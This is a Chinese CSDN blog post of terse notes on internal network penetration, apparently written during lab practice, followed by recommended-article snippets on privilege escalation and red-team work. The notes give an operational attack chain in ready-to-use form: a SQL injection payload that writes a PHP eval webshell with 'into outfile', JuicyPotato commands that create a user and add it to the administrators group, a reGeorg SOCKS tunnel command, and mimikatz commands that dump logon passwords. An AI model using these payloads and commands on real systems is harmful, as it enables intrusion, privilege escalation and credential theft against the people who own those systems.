内网渗透 雾

最新推荐文章于 2024-08-06 19:37:50 发布
最新推荐文章于 2024-08-06 19:37:50 发布
阅读量781 收藏 1
点赞数 3
分类专栏: 渗透 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guishengyx/article/details/124401507
版权
本文介绍了Web安全中的SQL注入技术,包括利用into outfile和intodumpfile导出文件创建Webshell。还讨论了提权方法,如利用系统漏洞和服务进行权限提升,并提及了远程桌面连接和端口查看。此外,提到了内网穿透工具如PHP和reGeorg,以及用于抓取密码的猕猴桃工具。
摘要由CSDN通过智能技术生成

(传参后界面变化,删除传参也不会改变)可能是http变成了https,插件问题

SQL注入可以写webshell

into outfile 导出文件

into dumpfile 导出文件

将查询的结果导出成文件

http://xxx.com/?id=1 union select 1,"<?php eval($_REQUEST[8])?>" into outfile 'C:/phpStudy/WWW/456.php'

Webshell管理工具

菜刀、蚁剑 => 一句话木马直接连接(默认流量没有加密)

冰蝎、哥斯拉 => 流量加密,一定要用专属马

github.com

提权

当我们遇到不是管理员的权限时,需要提权

1、利用目标主机上的服务提权(目标主机运行着xxx软件,但这个软件有漏洞可以利用)

2、利用web服务(一台机器上可能有多个网站,多个web容器)

3、利用Windows漏洞|Linux漏洞

系统漏洞

systeminfo

https://i.hacking8.com/tiquan/ 辅助提权网页

烂土豆

菜刀连接后,烂土豆拖进文件内

444.exe -p "net user as A1B2C3!.Qa /add" 添加用户

444.exe -p "net localgroup administrators as /add" 提升管理员权限

远程桌面只有管理员可以连接

netstat -ano 看端口,开了远程桌面

正向连接        请求 => PHP => 发送出去(不需要外网)

反向连接        目标 => 连接攻击者 (需要有外网)

3389咋么连接?

PHP作为中间媒介(php可以帮助我们发起请求)

reGeorg

可以将我们传输的数据给目标站点,成为沟通的桥梁

python2 reGeorgSocksProxy.py -u http://afsgr16-b1ferw.aqlab.cn/img/123.php -p 5242

监听电脑的5242端口

全局代理 =>需要的是所有流量 =>浏览器的代理

猕猴桃

privilege::debug        提升权限

sekurlsa::logonpasswords        抓取密码

  1. sql注入拿shell (into outfile into dumpfile) 
  2. Webshell管理工具(冰蝎菜刀)
  3. 内网穿透(通过reg来设置中转站,然后用代理工具代理远程桌面(Proxifier))
  4. 提权辅助页面,查询系统可能存在的漏洞
  5. 利用魔改版烂土豆提权
  6. 通过猕猴桃抓取系统存储密码
AlienStar
关注
专栏目录
溯源系列:溯源案例二(2022实战 | 记一次Everything服务引发的蓝队溯源以及Everything后渗透的利用简介)
weixin_54626591的博客
01-07 919
溯源案例二(2022实战 | 记一次Everything服务引发的蓝队溯源以及Everything后渗透的利用简介)
2023年网络安全岗面试跳槽看这一篇就够了(含面试题+大厂面经分享)
m0_71743066的博客
03-10 1544
又到了一年一度的金三银四面试季,想必有些朋友的心已经开始躁动了,毕竟跳槽涨薪的幅度远高于内部调薪的幅度!以下为网络安全各个方向涉及的面试题以及安全大厂的面经汇总,星数越多代表问题出现的几率越大,祝各位都能找到满意的工作。注:本套面试题及面经,已整理成pdf文档,但内容还在持续更新中,因为无论如何都不可能覆盖所有的面试问题,更多的还是希望由点达面,查漏补缺,希望对大家有帮助。
权限提升第一天-简单Web权限提升&转移
weixin_39953838的博客
12-26 484
你能提权成功,却提不了你在她心里的位置。
ack123打靶记录
lightsec
03-20 4995
前言: 此靶场是月师傅九月出师考核靶场,搭建过程参考文章红队考核靶场ack123下载和搭建 靶场地址:https://pan.baidu.com/s/13g_1FFg-ZYYpBwkCvKyYWQ提取码:7fkj 靶场拓扑图: 靶场的主要考点: 1.站库分离 外网打点 2.过360全家桶 3.过windwos defender 4.过火绒 5.内网漫游 6.多层网络渗透 7.横向渗透 8.jwt token密钥破解 9.权限提升 10.域渗透 11.phpmyadm..
【网络安全渗透测试零基础入门必知必会】之Windows权限提升实战,零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
08-06 639
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段系统权限提升与防御第2篇。当我们通过弱口令进入到应用后台管理当我们下载备份文件获取到数据库信息当我们通过漏洞拿到资产系统的Web权限当我们在公司被给予账号密码登录计算机或系统当我们在公司或钓鱼后门获取到某个公司机器系统。
【内网安全】——Windows提权姿势
qq_53058639的博客
01-27 1055
令牌(Token):令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动。令牌最大的特点就是随机性,不可预测,黑客或软件无法猜测出令牌。令牌分类访问令牌(Access Token): 表示访问控制操作主体的系统对象会话令牌(Session Token): 交互会话中唯一的身份标识符。
权限提升-数据库提权-MSF-UDF提权
xiaoheizi的博客
08-28 1015
在MySQL 5.1版本及以后的环境下,udf提权时需要将udf.dll导出到mysql安装目录\lib\plugin\目录下。不同的操作系统,不同的版本,提权时导出udf.dll存放的目录不一样。//创建函数绑定dll。查看或修改程序源代码,可以进行网站或应用的配置文件读取(接口配置信息,数据库配置信息等),还能收集服务器操作系统相关的信息,为后续系统提权做准备。2、当secure_file_priv 的值为 c:/ ,表示限制 mysqld 的导入|导出只能发生在c盘目录下,无法进行提权
Linux提权:定时任务 && 环境变量 && 配置不当 && 数据库
qq_61553520的博客
06-01 1011
比如chmod +x xxx.sh chmod 555 xxx.sh 这些都是正常的,但是有些管理员可能会由于粗心直接设置chmod 777 xxx.sh 此时普通用户也具有w权限,即具有写入权限,拿到普通用户权限之后可以直接修改xxx.sh,比如在脚本中添加反弹shell命令,从而利用定时任务执行反弹shell(执行为root权限)。使用单端口映射可以使多个不同的协议流量通过同一个端口进行传输。结合HTTP隧道和单端口映射,可以实现将其他协议的数据通过HTTP隧道传输,并映射到单个端口上的目标服务器上。
哥斯拉Godzilla shell管理工具
weixin_50464560的博客
09-03 3122
各大厂商的waf不断,在静态查杀、流量通信等方面对webshell进行拦截,众红队急需一款优秀的权限管理工具,冰蝎3.0的发布可能缓解了流量加密的困境,但是冰蝎3.0的bug众多,很多朋友甚至连不上冰蝎的shell, 于是团队的BeiChenDream师傅开发了这款“哥斯拉“  本文出自ChaBug Y4er师傅   简单使用方法 在哥斯拉安装之前,你需要安装jdk1....
域渗透测试教程(windows server 2012)
06-17
内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一 直是云里里。于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求。,此教程经过整理后,把关键的知识点写出来。
2023国护护网hw面试经历全记(推荐新手入门看)
2301_77815877的博客
08-04 1万+
2023大学生护网面经+经历
哥斯拉4.0.1.rar
03-05
哥斯拉,好用的用后门软件
第四章:服务的架构一定有漏洞
anquanzushiye的博客
01-10 525
第三章:服务的架构一定有漏洞(上)相较前两章,这一章的内容就相对温和许多了。服务的架构一定会有漏洞,这都是大家心知肚明的事。反而没什么好吃惊的。这一部分我会拆成几个章节写。这一章主要是在...
【权限提升】Linux系统&辅助项目&脏牛&Dirty&内核漏洞&SUID&GUID
今天是几号的博客
02-25 970
探针项目:BeRoot linux-exploit-suggester linux-exploit-suggester2。内核漏洞提权过程:寻可用-下exp-上/tmp-编译exp-执行(无权限用chmod)vulnhub靶机-探针目标-CMS漏洞利用-脚本探针提权漏洞-利用内核提权-GG。提权过程:连接-获取可利用漏洞-下载或上传EXP-编译EXP-给权限执行-GG。提权过程:探针是否有SUID(手工或脚本)-特定SUID利用-利用吃瓜-GG。cve-2017-16995漏洞利用。
webshell提权
m0_65096687的博客
05-23 1203
首先我们要清楚为什么要提权相关操作被拒绝。无法继续进行渗透。就需要提权我们通过各种web漏洞,中间件漏洞,或者cms等漏洞拿到权限后。得到的权限一般是后台权限,有些是webshell权限。如果是后台权限,我们就要通过后台上传后门得到webshell。然后反弹到我们的渗透工具中进行使用。我们所使用的蚁剑,哥斯拉,冰蝎,原理都是一种webshell管理工具。但我们的最终目的是为了得到服务器的权限,而且是服务器的最高权限。我们才能更好的利用工具进行后渗透,也就是内网渗透。渗透的权限从低到高大概分为。
烂土豆(JuicyPotato)提权
热门推荐
Shanfenglan's blog
11-18 9万+
CATALOG1.前言2.原理2.1前置知识2.2juicypotato实现流程3.实现3.1提权结果3.2实现步骤3.2.1先使用powershell脚本找到可用的CLSID3.2.2再使用bat文件确定能利用的CLSID3.2.3使用juicypotato进行利用4.防御方法5.参考文章 1.前言 很有名的一个提权工具,今天对其做一个小小的使用总结。 2.原理 2.1前置知识 首先我们要知道: 使用DCOM的时候,如果以服务方式远程连接,那么为system权限,例如BITS服务。 使用DCOM可以通过
Windows提权--小迪权限提升--烂土豆--DLL劫持--udf提权
z2560088的博客
02-13 4371
针对环境 windows有两种环境,一种是web网站拿到的webshell环境,一般是低权限的用户,(jsp除外,拿到webshell就是system权限)另一种是本地的环境,可能是服务器为管理某项服务创建的低权限用户。不同环境下的操作会有所不同。 提权方法 1.win溢出漏洞(如何判断类型和利用) 信息收集-补丁筛选-利用 MSF 或特定 EXP-执行-西瓜到手 Vulmap,Wes,WindowsVulnScan 对比,exp 在哪里获取? 利用wes进行补丁筛选 2.数据库提权 ...
记首次HW|某地级市攻防演练红队渗透总结
qq_18209847的博客
05-24 3531
申明:文章仅供技术交流,请自觉遵守网络安全相关法律法规,切勿利用文章内的相关技术从事非法活动,如因此产生的一切不良后果与文章作者无关 前言 上周参加了某地级市为期七天的网络攻防演练对抗赛,总共14支攻击队。大概情况是:第一天多为弱口令和应用层漏洞攻击且有攻击队申请高危漏洞攻击,之后想必都开始了高危漏洞利用,内网攻击,第四天就有攻击队开始使用0 day,Nday,社工钓鱼攻击,从第五天凌晨起进入混打乱斗模式,所有目标都变为公共目标,第七天18点停止对所有攻击队的授权,所有攻击队停止攻击,演练结束。最终评判结
红方人员实战手册
qq_36584013的博客
06-19 1053
红方人员实战手册 声明 Author : By klion Date : 2020.2.15 寄语 : 愿 2020 后面的每一天都能一切安好 分享初衷 一来, 旨在为 "攻击" / "防御"方 提供更加全面实用的参考 还是那句老闲话 "未知攻焉知防", 所有单纯去说 "攻" 或者 "防" 的都是耍流氓, 攻守兼备才能把路越走越宽 二来, 也是为秉承共享协作, 希望...
python内网渗透
10-24
Python内网渗透是指利用Python编写的工具和脚本,通过漏洞利用、端口扫描、密码爆破等方式,获取内网中的敏感信息或者控制内网主机的过程。常用的Python内网渗透工具有reGeorgSocksProxy、ABPTTS等。其中,reGeorgSocksProxy是一款基于HTTP隧道的反向Socks代理工具,可以将本地的TCP流量通过HTTP隧道转发到远程主机,从而实现内网穿透。而ABPTTS则是一款基于HTTP隧道的正向TCP代理工具,可以通过HTTP隧道将本地的TCP流量转发到远程主机,从而实现内网穿透。除此之外,Python还可以用于编写端口扫描器、密码爆破工具等,用于辅助内网渗透
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值